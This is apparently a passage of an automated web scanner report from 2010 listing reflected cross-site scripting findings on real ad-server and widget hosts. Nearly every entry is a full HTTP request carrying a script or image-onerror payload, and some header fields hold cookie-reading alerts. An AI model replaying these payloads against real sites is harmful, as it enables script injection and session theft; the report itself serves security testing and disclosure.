GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH52025"><script>alert(1)</script>9a88a4436ff;target=_blank;grp=9112943 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 268
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae9a"><script>alert(1)</script>4eace70c3c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943&fae9a"><script>alert(1)</script>4eace70c3c7=1 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 271
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c6b"><script>alert(1)</script>29753d2027c was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943b9c6b"><script>alert(1)</script>29753d2027c HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 268
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 531f7><script>alert(1)</script>a211c727b97 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=531f7><script>alert(1)</script>a211c727b97 HTTP/1.1 Host: adserver.adtech.de Proxy-Connection: keep-alive Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 285
2.39. http://api.typepad.com/blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 479ae<script>alert(1)</script>c95f7cd83e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js?479ae<script>alert(1)</script>c95f7cd83e8=1 HTTP/1.1 Host: api.typepad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151985724.1292505849.1.1.utmcsr=sixapart.com|utmccn=(referral)|utmcmd=referral|utmcct=/ns21bc1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eddc017331/at; __utma=151985724.1810450472.1292505849.1292505849.1292505849.1; __utmc=151985724; __utmb=151985724.1.10.1292505849;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload facd8"><script>alert(1)</script>854027c3dcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframefacd8"><script>alert(1)</script>854027c3dcd/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696bf"><script>alert(1)</script>ef60ef84e1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0696bf"><script>alert(1)</script>ef60ef84e1e/5113.1/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e000b"><script>alert(1)</script>737cb734964 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1e000b"><script>alert(1)</script>737cb734964/221794/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbc4"><script>alert(1)</script>a1d6b9ee5d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/2217948bbc4"><script>alert(1)</script>a1d6b9ee5d6/0/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3eed"><script>alert(1)</script>116ca518a2a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0d3eed"><script>alert(1)</script>116ca518a2a/-1/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd0ad"><script>alert(1)</script>3d04e0a0b58 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1fd0ad"><script>alert(1)</script>3d04e0a0b58/size=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 229
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87afe"><script>alert(1)</script>db17970b29 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size87afe"><script>alert(1)</script>db17970b29=300x250 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 228
2.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://at.atwola.com
Path:
/adiframe/3.0/5113.1/221794/0/-1/size=300x250
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408d4"><script>alert(1)</script>25739075e9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?408d4"><script>alert(1)</script>25739075e9e=1 HTTP/1.1 Host: at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JEB2=4CD6406B6E651A44E171CE41F0006986; atdses=O;
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 232
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 6584e<img%20src%3da%20onerror%3dalert(1)>08a51aba132 was submitted in the REST URL parameter 14. This input was echoed as 6584e<img src=a onerror=alert(1)>08a51aba132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a6584e<img%20src%3da%20onerror%3dalert(1)>08a51aba132/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:12 GMT Expires: Sun, 19 Dec 2010 15:00:12 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Content-Length: 7576 Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38aea<a>22467d2f7ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce38aea<a>22467d2f7ac/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:52 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Content-Length: 1158 Connection: close
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 88370<img%20src%3da%20onerror%3dalert(1)>8cad21eecc was submitted in the REST URL parameter 14. This input was echoed as 88370<img src=a onerror=alert(1)>8cad21eecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d588370<img%20src%3da%20onerror%3dalert(1)>8cad21eecc/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:14 GMT Expires: Sun, 19 Dec 2010 15:00:14 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Content-Length: 7550 Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45296<a>dc6117bca29 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade013845296<a>dc6117bca29/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:52 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Content-Length: 1158 Connection: close
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 40923<img%20src%3da%20onerror%3dalert(1)>b9cd89d2e8c was submitted in the REST URL parameter 14. This input was echoed as 40923<img src=a onerror=alert(1)>b9cd89d2e8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c40923<img%20src%3da%20onerror%3dalert(1)>b9cd89d2e8c/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:09 GMT Expires: Sun, 19 Dec 2010 15:00:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Content-Length: 7577 Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93b0e<a>3573c4fa22e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea47593b0e<a>3573c4fa22e/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:49 GMT Expires: Sun, 7 May 1995 12:00:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Pragma: no-cache Server: Apache/2.2.3 (Red Hat) Content-Length: 1158 Connection: close
The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 5c64f<img%20src%3da%20onerror%3dalert(1)>4f10f27000f was submitted in the REST URL parameter 10. This input was echoed as 5c64f<img src=a onerror=alert(1)>4f10f27000f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:5c64f<img%20src%3da%20onerror%3dalert(1)>4f10f27000f//ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:06 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload ee675<img%20src%3da%20onerror%3dalert(1)>9295dd52fa7 was submitted in the REST URL parameter 11. This input was echoed as ee675<img src=a onerror=alert(1)>9295dd52fa7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.netee675<img%20src%3da%20onerror%3dalert(1)>9295dd52fa7/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload de6bd<img%20src%3da%20onerror%3dalert(1)>79ed0ebf432 was submitted in the REST URL parameter 12. This input was echoed as de6bd<img src=a onerror=alert(1)>79ed0ebf432 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clkde6bd<img%20src%3da%20onerror%3dalert(1)>79ed0ebf432 HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:12 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 220e1<img%20src%3da%20onerror%3dalert(1)>11fe418b31b was submitted in the REST URL parameter 4. This input was echoed as 220e1<img src=a onerror=alert(1)>11fe418b31b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id220e1<img%20src%3da%20onerror%3dalert(1)>11fe418b31b/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:48 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd72b<img%20src%3da%20onerror%3dalert(1)>26ee0bd96c1 was submitted in the REST URL parameter 5. This input was echoed as fd72b<img src=a onerror=alert(1)>26ee0bd96c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3cefd72b<img%20src%3da%20onerror%3dalert(1)>26ee0bd96c1/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:51 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ca147<img%20src%3da%20onerror%3dalert(1)>5a5384338c5 was submitted in the REST URL parameter 6. This input was echoed as ca147<img src=a onerror=alert(1)>5a5384338c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:ca147<img%20src%3da%20onerror%3dalert(1)>5a5384338c5//img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6650a<img%20src%3da%20onerror%3dalert(1)>ecade577ac8 was submitted in the REST URL parameter 7. This input was echoed as 6650a<img src=a onerror=alert(1)>ecade577ac8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com6650a<img%20src%3da%20onerror%3dalert(1)>ecade577ac8/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:00:57 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 8bc7b<img%20src%3da%20onerror%3dalert(1)>4e400dae6d3 was submitted in the REST URL parameter 8. This input was echoed as 8bc7b<img src=a onerror=alert(1)>4e400dae6d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded8bc7b<img%20src%3da%20onerror%3dalert(1)>4e400dae6d3/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:00 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 84524<img%20src%3da%20onerror%3dalert(1)>d41c2a32747 was submitted in the REST URL parameter 9. This input was echoed as 84524<img src=a onerror=alert(1)>d41c2a32747 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b9684524<img%20src%3da%20onerror%3dalert(1)>d41c2a32747/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1 Host: cdn.widgetserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript;charset=UTF-8 Date: Thu, 16 Dec 2010 15:01:02 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Connection: close Content-Length: 17789
The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 3cf92<img%20src%3da%20onerror%3dalert(1)>c32d66ccddf was submitted in the REST URL parameter 10. This input was echoed as 3cf92<img src=a onerror=alert(1)>c32d66ccddf in the application's response.
